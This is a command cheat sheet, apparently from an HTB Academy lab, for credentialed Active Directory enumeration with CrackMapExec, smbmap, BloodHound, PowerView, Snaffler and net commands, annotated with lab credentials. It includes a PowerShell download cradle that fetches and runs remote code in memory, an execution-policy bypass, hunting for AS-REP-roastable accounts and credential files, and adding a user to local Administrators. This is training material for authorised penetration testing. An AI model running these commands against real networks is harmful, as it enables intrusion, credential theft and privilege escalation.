Credentialed Enumeration
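# Credentialed SMB enumeration with CrackMapExec and smbmap.
# Define the target and credentials once instead of repeating the password on
# every command line (these are the HTB Academy "Inlanefreight" lab creds).
# NOTE: the password still ends up in shell history and in `ps` output; prefix
# the command with a space (HISTCONTROL=ignorespace) or authenticate with a
# Kerberos ticket (-k) where the tool supports it.
TARGET='<IP>'
DOMAIN='INLANEFREIGHT.LOCAL'
AD_USER='forend'
AD_PASS='Klmcargo2'

# Neither tool needs root, so no sudo: run as your normal user.
# Domain users
crackmapexec smb "$TARGET" -u "$AD_USER" -p "$AD_PASS" --users
# Domain groups
crackmapexec smb "$TARGET" -u "$AD_USER" -p "$AD_PASS" --groups
# Users with an active session on the target
crackmapexec smb "$TARGET" -u "$AD_USER" -p "$AD_PASS" --loggedon-users
# Shares and our access level on each
crackmapexec smb "$TARGET" -u "$AD_USER" -p "$AD_PASS" --shares
# Walk a share and record readable files/dirs (spider_plus writes a JSON listing locally)
crackmapexec smb "$TARGET" -u "$AD_USER" -p "$AD_PASS" -M spider_plus --share 'Department Shares'
# Share access overview via smbmap
smbmap -u "$AD_USER" -p "$AD_PASS" -d "$DOMAIN" -H "$TARGET"
# Recursive directory listing of one share (directories only keeps the output readable)
smbmap -u "$AD_USER" -p "$AD_PASS" -d "$DOMAIN" -H "$TARGET" -R '<share-name>' --dir-only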
HTB_@cademy_stdnt! <RID>
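# LDAP enumeration (windapsearch) and BloodHound collection against the DC.
# The username for windapsearch is the UPN; the page's "[email protected]" was a
# mangled copy of forend@inlanefreight.local.
DC_IP='172.16.5.5'
AD_UPN='forend@inlanefreight.local'
AD_USER='forend'
AD_PASS='Klmcargo2'

# Domain Admins (direct and nested) via LDAP
python3 windapsearch.py --dc-ip "$DC_IP" -u "$AD_UPN" -p "$AD_PASS" --da
# Privileged users (members of high-value groups)
python3 windapsearch.py --dc-ip "$DC_IP" -u "$AD_UPN" -p "$AD_PASS" -PU
# Full BloodHound collection; -ns points DNS resolution at the DC. No root needed, so no sudo.
bloodhound-python -u "$AD_USER" -p "$AD_PASS" -ns "$DC_IP" -d inlanefreight.local -c all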
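# Load the ActiveDirectory module (available where RSAT / the AD PowerShell feature is installed)
Import-Module ActiveDirectory
# Domain overview: name, DCs, functional level, domain SID
Get-ADDomain
# All users. Get-ADUser requires -Identity or -Filter; run bare it just prompts for a filter.
Get-ADUser -Filter *
# All trust relationships of this domain
Get-ADTrust -Filter *
# Names of every group in the domain
Get-ADGroup -Filter * | select name
# Details of one group (the page had "GetADGroup", which is not a cmdlet)
Get-ADGroup -Identity <group-name>
# Direct members of a group
Get-ADGroupMember -Identity <group-name>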
# PowerView enumeration; requires PowerView.ps1 to be loaded in the session.
# Current domain object
Get-Domain
# Domain controllers of the current domain
Get-DomainController
# All user objects
Get-DomainUser
# All computer objects
Get-DomainComputer
# All groups
Get-DomainGroup
# All organizational units
Get-DomainOU
# Object ACLs granting modification rights to non-built-in principals (ACL abuse candidates)
Find-InterestingDomainAcl
# Members of a group (pass -Identity <group>)
Get-DomainGroupMember
# All Group Policy Objects
Get-DomainGPO
# Resolve the SID of the principal whose GPO rights we want to inspect;
# replace "Domain Users" with the user or group of interest.
$principalSid = Convert-NameToSid "Domain Users"
# Every ACE on every GPO where that SID is the trustee, i.e. which GPOs it can read/modify
Get-DomainGPO | Get-ObjectAcl | Where-Object { $_.SecurityIdentifier -eq $principalSid }
# Domain policy settings (password, lockout, Kerberos) from the default domain policy
Get-DomainPolicy
# Local groups on the current host (or -ComputerName <host>)
Get-NetLocalGroup
# Members of a local group (use -GroupName; defaults to Administrators)
Get-NetLocalGroupMember
# Search readable domain shares for files with interesting names (creds, configs, keys)
Find-InterestingDomainShareFile
# Hosts in the domain where the current user has local admin rights (noisy: touches every host)
Find-LocalAdminAccess
# Trusts of the current domain
Get-DomainTrust
# Trusts of the current forest
Get-ForestTrust
# Enumerate all reachable trusts recursively
Get-DomainTrustMapping
# Users whose description field is populated (descriptions sometimes hold passwords or hints)
Get-DomainUser * | Where-Object { $_.Description -ne $null } | Select-Object samaccountname,description
# Users flagged PASSWD_NOTREQD: they may have an empty password
Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol
# Users without Kerberos pre-authentication (AS-REP roastable)
Get-DomainUser -PreauthNotRequired | Select-Object samaccountname,userprincipalname,useraccountcontrol | Format-List
https://github.com/SnaffCon/Snaffler
Snaffler helps acquire credentials and other sensitive data in an Active Directory environment. It works by obtaining a list of hosts within the domain and then enumerating those hosts for shares and readable directories.
# Run Snaffler against the domain: -d domain to enumerate, -s also print results to stdout,
# -o write results to a log file, -v data = "Data" verbosity (results only)
Snaffler.exe -d inlanefreight.local -s -v data -o snaffler.log
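# Host name
hostname
# OS version and build (Major.Minor.Build.Revision)
[System.Environment]::OSVersion.Version
# Installed patches and hotfixes. wmic is deprecated and missing on recent Windows
# builds, so use the PowerShell cmdlet; the wmic form is kept for older hosts.
Get-HotFix | Select-Object HotFixID,Description,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn
# Modules loaded in this session (add -ListAvailable to see installable ones)
Get-Module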
# Execution policy for every scope (MachinePolicy, UserPolicy, Process, CurrentUser, LocalMachine)
Get-ExecutionPolicy -List
# Relax the policy for this process only; it reverts when the process exits, so
# nothing persistent is changed on the host. (Execution policy is not a security
# boundary, so this needs no elevated rights.)
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process
# Environment variables: paths, user, computer name, etc.
Get-ChildItem Env: | Format-Table Key,Value
# Download cradle: fetch a script over HTTP(S) and run it in memory via IEX without touching disk.
# Caveats: this executes whatever the URL returns, so only use HTTPS to a host you control;
# -nop skips the profile; Defender/AMSI commonly flag this pattern, so check Get-MpComputerStatus first.
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL to download the file from'); <follow-on commands>"
# Windows Firewall state for all profiles (domain/private/public)
netsh advfirewall show allprofiles
# Windows Defender state: real-time protection, AMSI, signature age
Get-MpComputerStatus
# Local account policy: password length/age, lockout threshold and duration
net accounts
# The same policy for the domain (queried from the DC)
net accounts /domain
# All domain groups
net group /domain
# Members of Domain Admins (direct members only; nested groups are not expanded)
net group "Domain Admins" /domain
# Computer accounts joined to the domain
net group "domain computers" /domain
# Computer accounts of the domain controllers
net group "Domain Controllers" /domain
# Members of an arbitrary domain group
net group <domain_group_name> /domain
# All domain groups (same as `net group /domain`)
net groups /domain
# List members of the Administrators group on the DC (/domain runs it there);
# Domain Admins is a member of this group by default
net localgroup administrators /domain
# Add a user to the local Administrators group. This MODIFIES the host (not enumeration):
# it needs admin rights, logs a 4732 "member added" event, and should be reverted afterwards.
net localgroup administrators [username] /add
# Shares exported by this host (including admin shares like C$ and ADMIN$)
net share
# Details of one domain user: group membership, logon hours, last logon, password dates
net user <ACCOUNT_NAME> /domain
# All domain users
net user /domain
# Computers visible via network browsing (use `net view /domain` for the domain-wide list)
net view